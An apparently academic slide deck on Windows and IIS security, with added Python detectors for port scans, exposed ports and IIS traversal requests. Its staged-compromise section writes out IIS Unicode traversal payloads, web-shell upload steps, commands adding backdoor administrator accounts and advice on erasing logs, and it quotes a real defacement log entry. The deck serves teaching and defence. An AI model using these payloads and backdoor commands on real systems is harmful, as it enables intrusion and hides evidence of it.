Windows Security Analysis: Computer Science E-Commerce Security. Matthew Cook, http://escarpment.net/
Introduction • Loughborough University http://www.lboro.ac.uk/computing/ • Janet Web Cache Service http://wwwcache.ja.net/
Windows Security Analysis • Introduction • Step-by-step Machine Compromise • Preventing Attack • Further Reading • The Future
Introduction • Physical Security • Security Threats • “Hacker” or “Cracker” • The Easiest Security Improvement • Can you buy security?
Physical Security • Secure Location • BIOS restrictions • Password Protection • Boot Devices • Case Locks • Case Panels
Security Threats • Denial of Service • Theft of information • Modification • Fabrication (Spoofing or Masquerading)
Security Threats… Why a compromise can occur: • Physical Security Holes • Software Security Holes • Incompatible Usage Security Holes • Social Engineering • Complacency
“Hacker” or “Cracker” • “Hacker” is used primarily by the media to describe malicious attacks by individuals • However, the computing community uses “Cracker” to mean the same • A “Hacker” tinkers with systems for good purposes (not breaking the law) • To avoid confusion many people now say “A machine has been compromised!” rather than “A machine has been hacked!”
The Easiest Security Improvement • Good passwords • Usernames and Passwords are the primary security defence • Use a password that is easy to type to avoid ‘Shoulder Surfers’ • Use the first letters from song titles, song lyrics or film quotations
Can you buy Security? “This system is secure.” A product vendor might say: “This product makes your network secure.” Or: “We secure e-commerce.” Inevitably, these claims are naïve and simplistic. They look at the security of the product, rather than the security of the system. The first questions to ask are: “Secure from whom?” and “Secure against what?” Bruce Schneier
Step-by-step Machine Compromise • Background • Gathering Information • Identifying System Weakness • Exploiting the Security Hole • Gaining ‘Root’ • Backdoor Access • System Alteration • Audit Trail Removal
Background Reasons for Attack: • Personal Issues • Political Statement • Financial Gain (Theft of money, information) • Learning Experience • DoS (Denial of Service) • Support for Illegal Activity • In our scenario we are going to attack the company laggyband.com
Gathering Information • Companies House • Internet Search URL: http://www.google.co.uk • Whois URL: http://www.netsol.com/cgi-bin/whois/whois • A Whois query can provide: • The Registrant • The Domain Names Registered • The Administrative, Technical and Billing Contact • Record updated and created date stamps • DNS Servers for the Domain
Gathering Information… • Use Nslookup or dig • dig @dns.laggyband.com www.laggyband.com • Different query types available: • A – Network address • Any – All or Any Information available • Mx – Mail exchange records • Soa – Zone of Authority • Hinfo – Host information • Axfr – Zone Transfer • Txt – Additional strings
Identifying System Weakness Many products available: • Nmap • Nessus • Pandora • Pwdump • L0pht Crack • Null Authentication
Nmap • Port Scanning Tool • Stealth scanning, OS Fingerprinting • Open Source • Runs under Unix based OS • Port development for Win32 • URL: http://www.insure.org/nmap/
Nessus • Remote security scanner similar to Typhon • Very comprehensive • Frequently updated modules • Testing of DoS attacks • Open Source • Win32 and Java Client • URL: http://nessus.org/
Pandora • Not strictly Windows Security • Runs on either Unix or Win32 • Excellent tool to evaluate Netware security • Open Source • Lots of additional information • URL: http://www.nmrc.org/pandora/
pwdump • Version 3 (e = encrypted) • Developed by Phil Staubs and Erik Hjelmstad • Based on pwdump and pwdump2 • URL: http://www.ebiz-tech.com/html/pwdump.html • Needs Administrative Privileges • Extracts hashes even if syskey is installed • Extracts from remote machines • Identifies accounts with no password • Self-contained utility
L0pht Crack • Password Auditing and Recovery • Crack Passwords from many sources • Registration $249 • URL: http://www.atstake.com/research/lc3/
L0pht Crack Crack Passwords from: • Local Machine • Remote Machine • SAM File • SMB Sniffer • PWDump file
Nmap Analysis • nmap -sP 158.125.0.0/16 • Dependent on ICMP (Internet Control Message Protocol) • nmap -sP -PT80 158.125.0.0/16 • Dependent on TCP SYN/ACK packet
Nmap Analysis… • TCP Connect Scan • Completes a ‘Three Way Handshake’ • Very noisy (Detection by IDS)
Nmap Analysis… • TCP SYN Scan • Half open scanning (Full port TCP connection not made) • Less noisy than the TCP Connect Scan
Nmap Analysis… • TCP FIN Scan • FIN Packet sent to target port • RST returned for all closed ports • Mostly works against UNIX-based TCP/IP Stacks • TCP Xmas Tree Scan • Sends a FIN, URG and PUSH packet • RST returned for all closed ports • TCP Null Scan • Turns off all flags • RST returned for all closed ports • UDP Scan • UDP Packet sent to target port • “ICMP Port Unreachable” for closed ports
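The scan types on the Nmap Analysis slides are exactly the patterns an IDS at the firewall (mentioned later under Audit Trail Removal) keys on. As an added example for this page, not code from the presentation or from Nmap, the classifier below tags client-side TCP packets by the flag combinations the slides name (bare FIN, FIN+URG+PUSH, no flags at all, SYN that is never followed by an ACK) and reports a source once it has probed a threshold number of distinct ports. The packet records and addresses are constructed, and the five-port threshold is an assumed tuning value.

```python
from collections import defaultdict

# Constructed sample: client-side TCP packets as a firewall or IDS sensor might
# record them (no server replies). Flags: S=SYN, A=ACK, F=FIN, P=PSH, U=URG.
def _pkt(src, dport, flags, dst="192.0.2.10"):
    return {"src": src, "dst": dst, "dport": dport, "flags": flags}

SAMPLE_PACKETS = (
    # 10.0.0.50: SYN to eight ports, no ACK ever follows (half-open SYN scan)
    [_pkt("10.0.0.50", p, "S") for p in (21, 22, 23, 25, 80, 110, 139, 445)]
    # 10.0.0.51: bare FIN to five ports (FIN scan)
    + [_pkt("10.0.0.51", p, "F") for p in (21, 22, 23, 80, 443)]
    # 10.0.0.52: an ordinary client completing handshakes to two ports
    + [_pkt("10.0.0.52", 80, "S"), _pkt("10.0.0.52", 80, "A"),
       _pkt("10.0.0.52", 443, "S"), _pkt("10.0.0.52", 443, "A")]
    # 10.0.0.53: three flag-less packets, below the reporting threshold
    + [_pkt("10.0.0.53", p, "") for p in (22, 80, 445)]
)


def classify_flags(flags):
    """Map a TCP flag combination to the scan type it is characteristic of."""
    f = set(flags.upper())
    if not f:
        return "null"      # Null scan: every flag turned off
    if f == {"F"}:
        return "fin"       # FIN scan: FIN on its own
    if f == {"F", "P", "U"}:
        return "xmas"      # Xmas Tree scan: FIN, URG and PUSH together
    return None            # normal flag combinations (SYN, ACK, RST ...)


def detect_scans(packets, port_threshold=5):
    """Return sorted (source, scan_type, distinct_ports) tuples for every
    source that probed at least port_threshold ports with one pattern.
    port_threshold is an assumed tuning value, not something the slides give."""
    odd_flags = defaultdict(lambda: defaultdict(set))   # src -> type -> ports
    syn_ports = defaultdict(set)                          # (src, dst) -> ports
    ack_ports = defaultdict(set)                          # (src, dst) -> ports
    for p in packets:
        kind = classify_flags(p["flags"])
        flags = set(p["flags"].upper())
        if kind is not None:
            odd_flags[p["src"]][kind].add(p["dport"])
        elif flags == {"S"}:
            syn_ports[(p["src"], p["dst"])].add(p["dport"])
        elif "A" in flags:
            ack_ports[(p["src"], p["dst"])].add(p["dport"])

    findings = []
    for src, kinds in odd_flags.items():
        for kind, ports in kinds.items():
            if len(ports) >= port_threshold:
                findings.append((src, kind + "_scan", len(ports)))
    for (src, dst), ports in syn_ports.items():
        completed = ports & ack_ports[(src, dst)]
        half_open = ports - completed
        if len(half_open) >= port_threshold:   # SYN scan: handshakes never finished
            findings.append((src, "syn_scan", len(half_open)))
        if len(completed) >= port_threshold:   # connect scan: full handshakes
            findings.append((src, "connect_scan", len(completed)))
    return sorted(findings)


if __name__ == "__main__":
    for src, kind, n in detect_scans(SAMPLE_PACKETS):
        print(f"{src}: {kind} across {n} ports")
```

The connect-scan branch is why the slides call that scan "very noisy": every probe leaves a completed handshake, which any connection log records, whereas the SYN-scan branch only sees handshakes that were never finished. A real sensor would also count the RST and ICMP Port Unreachable replies the slides mention, which this client-side view omits.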
Null Authentication Null Authentication: • Net use \\camford\IPC$ "" /u:"" • Famous tools like ‘Red Button’ • Net view \\camford • List of Users, groups and shares • Last logged on date • Last password change • Much more…
Exploiting the Security Hole • Using IIS Unicode/Directory Traversal • /scripts/../../winnt/system32/cmd.exe /c+dir • /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir • Displays the listing of c: in browser • Copy cmd.exe to /scripts/root.exe • Echo upload.asp • GET /scripts/root.exe /c+echo+[blah]>upload.asp • Upload cmdasp.asp using upload.asp • Still vulnerable on 24% of E-Commerce servers
Gaining ‘Root’ • Cmdasp.asp provides a cmd shell in the SYSTEM context • Increase in privileges is now simple • ISAPI.dll – RevertToSelf (Horovitz) • Version 2 coded by Foundstone • http://camford/scripts/idq.dll? • Patch Bulletin: MS01-26 • NOT included in Windows 2000 SP2
Backdoor Access • Create several user accounts • Net user iisservice <pass> /ADD • Net localgroup administrators iisservice /ADD • Add root shells on high end ports • Tiri is 3Kb in size • Add backdoors to ‘Run’ registry keys
System Alteration • Web page alteration • Information Theft • Enable services • Add VNC • Creating a Warez Server • Net start msftpsvc • Check access • Upload file 1Mb in size • Advertise as a warez server
Audit Trail Removal • Many machines have auditing disabled • Main problems are IIS logs • DoS IIS before logs sync to disc • Erase logs from hard disc • Erasing Eventlog harder • IDS Systems • Network Monitoring at firewall
Preventing Attack • NetBIOS/SMB Services • Hfnetchk and Qchain • SNMP Vulnerabilities • Active Directory Vulnerabilities • IPSec • IIS Security • IDS – Snort • .NET Server
NetBIOS/SMB Services • NetBIOS Browsing Request [UDP 137] • NetBIOS Browsing Response [UDP 138] • NetBIOS Communications [TCP 135] • CIFS [TCP 139, 445 UDP 445] • Port 445 Windows 2000 only • Block ports at firewall • Netstat -A
NetBIOS/SMB Services… To disable NetBIOS • Select ‘Disable NetBIOS’ in the WINS tab of advanced TCP/IP properties. • Deselect ‘File and Print sharing’ in the advanced settings of the ‘Network and Dial-up connections’ window
NetBIOS/SMB Services… Disable Null Authentication • Key similar to Windows NT 4.0 • HKLM\SYSTEM\CurrentControlSet\Control\LSA\RestrictAnonymous • REG_DWORD set to 0, 1 or 2! • HKLM\SYSTEM\CurrentControlSet\Control\SecurePipeServers\RestrictAnonymous • REG_DWORD set to 0 or 1
Hfnetchk • Use Hfnetchk to check hot fixes • Checks machines against Microsoft XML • Automate the process using batch files and a mail client (Postie) • URL: http://www.infradig.com/infradig/postie/ • Use QChain to chain hot fixes together without rebooting in-between.
Hfnetchk… Patch details for: • Windows NT 4.0, 2000, XP, .NET server • IIS 4, IIS 5 and IIS 6 • SQL Server 7.0 • SQL Server 2000 • Internet Explorer 5.01 (and later)
Hfnetchk… • Default scan of local host (pre-downloaded XML): hfnetchk -x mssecure.xml • Default scan of lboro domain: hfnetchk -d lboro • Verbose scan of local host: hfnetchk -v -x mssecure.xml • Verbose scan including installed hot fixes: hfnetchk -v -a b -x mssecure.xml
SNMP Vulnerabilities • Simple Network Management Protocol • Snmpwalk camford public .1.3.6.1.4.1.77.1.2.25 • SNMP Utilities in Resource Kit • Turn off SNMP services • Set community names • Set accepted hosts
SNMP Vulnerabilities… • CERT Advisory “Tuesday 12th February” • Privilege Escalation, DoS, Instability • Block UDP 161 and 162 at firewall • Patch or disable SNMP • Patches available for Windows 2000 and XP • URL: http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms02-006.asp
AD Vulnerabilities • Listing of AD contents using ldp.exe • Ldp is included in the Resource Kit • Authenticated connection needed • Filter TCP 389 (LDAP) and 3268 (GC) • DNS – Securing Zone Transfers to Slave Name servers only
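The NetBIOS/SMB, SNMP and AD slides each end with ports to block or filter at the firewall. As an added example for this page (not the author's code), the audit below turns those three lists into one check: it parses Windows netstat -an output, keeps listening TCP sockets and bound UDP sockets, and reports any that sit on a port the slides say to block, labelled with the slide's own name for the service. The netstat sample is constructed, and the Windows column layout (Proto, Local Address, Foreign Address, State) is assumed.

```python
import re

# Ports the slides say to block or filter at the firewall, with the slides'
# own labels. The mapping was built for this example from the NetBIOS/SMB,
# SNMP and AD slides; it is not a list shipped by any tool.
EXPOSED_PORT_POLICY = {
    ("tcp", 135): "NetBIOS communications: block at firewall",
    ("udp", 137): "NetBIOS browsing request: block at firewall",
    ("udp", 138): "NetBIOS browsing response: block at firewall",
    ("tcp", 139): "CIFS: block at firewall",
    ("tcp", 445): "CIFS (Windows 2000): block at firewall",
    ("udp", 445): "CIFS (Windows 2000): block at firewall",
    ("udp", 161): "SNMP: block at firewall, patch or disable",
    ("udp", 162): "SNMP trap: block at firewall, patch or disable",
    ("tcp", 389): "LDAP: filter at firewall",
    ("tcp", 3268): "Global Catalog: filter at firewall",
}

# Constructed 'netstat -an' output for a Windows 2000 host (addresses made up).
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:389            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    192.0.2.10:139         0.0.0.0:0              LISTENING
  TCP    192.0.2.10:139         192.0.2.25:1039        ESTABLISHED
  UDP    0.0.0.0:161            *:*
  UDP    192.0.2.10:137         *:*
  UDP    192.0.2.10:138         *:*
"""

# Proto, local address, foreign address and an optional state column.
SOCKET_LINE = re.compile(r"^\s*(TCP|UDP)\s+(\S+)\s+(\S+)(?:\s+(\S+))?\s*$")


def parse_netstat(text):
    """Return sorted (proto, port) pairs for every listening TCP socket and
    every bound UDP socket. Established connections are not listeners and
    are skipped, so a port is reported once however many clients use it."""
    sockets = set()
    for line in text.splitlines():
        m = SOCKET_LINE.match(line)
        if not m:
            continue                      # header, blank line, other text
        proto, local, _foreign, state = m.groups()
        proto = proto.lower()
        port = int(local.rsplit(":", 1)[1])
        if proto == "tcp" and state != "LISTENING":
            continue
        sockets.add((proto, port))
    return sorted(sockets)


def audit_exposed_ports(text):
    """Return (proto, port, recommendation) for each listener on a port the
    slides say to block or filter."""
    return [(proto, port, EXPOSED_PORT_POLICY[(proto, port)])
            for proto, port in parse_netstat(text)
            if (proto, port) in EXPOSED_PORT_POLICY]


if __name__ == "__main__":
    for proto, port, note in audit_exposed_ports(SAMPLE_NETSTAT):
        print(f"{proto.upper()} {port}: {note}")
```

Run it against the real output of netstat -an on the host being hardened; anything it prints is either a service to disable (the slides' WINS-tab and File and Print Sharing steps, or turning SNMP off) or a port that must be blocked at the firewall before the host is reachable from the Internet.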
IPSec • IP security • Linux Connectivity using FreeS/WAN • Mainly for wireless use • WEP encryption cracked • URL: http://www.freeswan.org/ • URL: http://airsnort.sourceforge.net/
IIS Security • History • Recent Worms • IIS Lock Down Tool • URL Scan • The Future
IIS History • IIS 2.0 Installed by NT 4.0 • IIS 3.0 followed by more common IIS 4.0 • Quickly gained reputation for (in)security • IIS 5.0 Installed by Windows 2000 • IIS 6.0 Installed by .NET Server • Microsoft releases Hfnetchk • Closely followed by IIS Lockdown and URLScan
Recent Worms • Sadmind/IIS: Directory Traversal (Unicode Exploit) • CodeRed: ida/idq buffer overflow • CodeGreen: ida/idq buffer overflow • Nimda: Directory Traversal (Unicode Exploit)
Sadmind/IIS • 2001-05-03 22:34:49 203.67.x.x - 158.125.x.x 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>f***+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>f***+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:sysadmcn@yahoo.com.cn^</html^>>../wwwroot/default.htm 200 -
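The Sadmind/IIS log entry above, and the Exploiting the Security Hole slide before it, show what the Unicode directory-traversal attack leaves in the IIS logs: a request for /scripts/root.exe, or a path containing .. followed by an overlong-encoded separator such as %c0%af. As an added example for this page (not the author's code), the detector below parses IIS W3C extended log lines, percent-decodes the URI stem twice so that a double-encoded separator such as %255c is exposed as well, and flags any request whose decoded path contains .. followed by a separator or by a UTF-8 lead byte that can only start an overlong sequence, or that names cmd.exe or root.exe. The sample log lines are constructed (addresses and names made up); the field order follows the entry above.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed IIS W3C extended log lines, field order as in the Sadmind/IIS
# entry: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem
# cs-uri-query sc-status cs(User-Agent). Addresses and names are made up.
SAMPLE_IIS_LOG = """\
2001-05-03 22:30:01 10.0.0.5 - 192.0.2.10 80 GET /default.htm - 200 -
2001-05-03 22:31:12 10.0.0.7 - 192.0.2.10 80 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir 200 -
2001-05-03 22:32:40 10.0.0.7 - 192.0.2.10 80 GET /scripts/root.exe /c+echo+test>upload.asp 200 -
2001-05-03 22:33:05 10.0.0.9 - 192.0.2.10 80 GET /scripts/..%255c..%255cwinnt/system32/cmd.exe /c+dir 404 -
2001-05-03 22:34:49 10.0.0.11 - 192.0.2.10 80 GET /images/logo.gif - 200 -
"""

# ".." followed by a real separator, or by a lead byte that is never valid
# UTF-8 except as the start of an overlong sequence (0xC0/0xC1 two-byte
# forms, 0xE0 0x80 three-byte forms). Unpatched IIS decoded such overlong
# forms to '/' or '\' after its path check had already passed.
TRAVERSAL_RE = re.compile(rb"\.\.(?:/|\\|[\xc0\xc1]|\xe0\x80)")
SHELL_NAMES = (b"cmd.exe", b"root.exe")   # root.exe: the copied cmd.exe on the slide


def decode_uri(stem, rounds=2):
    """Percent-decode the URI stem to raw bytes, twice, so a double-encoded
    separator (%255c -> %5c -> \\) is visible on the second pass."""
    data = stem.encode("ascii", "replace")
    for _ in range(rounds):
        data = unquote_to_bytes(data)
    return data


def analyse_request(line):
    """Return a finding dict for a suspicious request line, else None."""
    fields = line.split()
    if len(fields) < 10 or fields[6] not in ("GET", "POST", "HEAD"):
        return None                           # header, comment or malformed line
    client, stem, status = fields[2], fields[7], fields[9]
    decoded = decode_uri(stem).lower()
    reasons = []
    if TRAVERSAL_RE.search(decoded):
        reasons.append("traversal")
    reasons += [name.decode() for name in SHELL_NAMES if name in decoded]
    if not reasons:
        return None
    return {"client": client, "stem": stem, "status": status, "reasons": reasons}


def scan_iis_log(lines):
    """Run analyse_request over every line and keep the hits, in log order."""
    return [hit for hit in map(analyse_request, lines) if hit]


if __name__ == "__main__":
    for hit in scan_iis_log(SAMPLE_IIS_LOG.splitlines()):
        print(hit["client"], hit["status"], ", ".join(hit["reasons"]), hit["stem"])
```

A 404 is still reported, because a failed probe is the early warning that matters, and the real entry above would be flagged by the root.exe rule. Since the Audit Trail Removal slide notes that IIS logs are the attacker's main target, this check is only worth running on logs that have been copied off the web server to a host the attacker cannot reach.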
IIS Lock Down Tool • Automatic ‘Lock Down’ [Now 2nd version] • Locks down IIS 4.0 and IIS 5.0 • Express ‘lock down’ for simple web sites • Custom ‘lock down’ for more complex servers • Undo facility to reverse last ‘lock down’ • URL: http://www.microsoft.com/Downloads\Release.asp?ReleaseID=32362
IIS Lock Down Tool… Disable: Active Server Pages • Index Server Interface • Server Side Includes • Internet Data Connector • Internet Printing • HTR Scripting. Remove: Sample Web Files • Script Virtual Directory • MSADC Directory • WebDAV. Set Permissions on: Exe files • Content Directories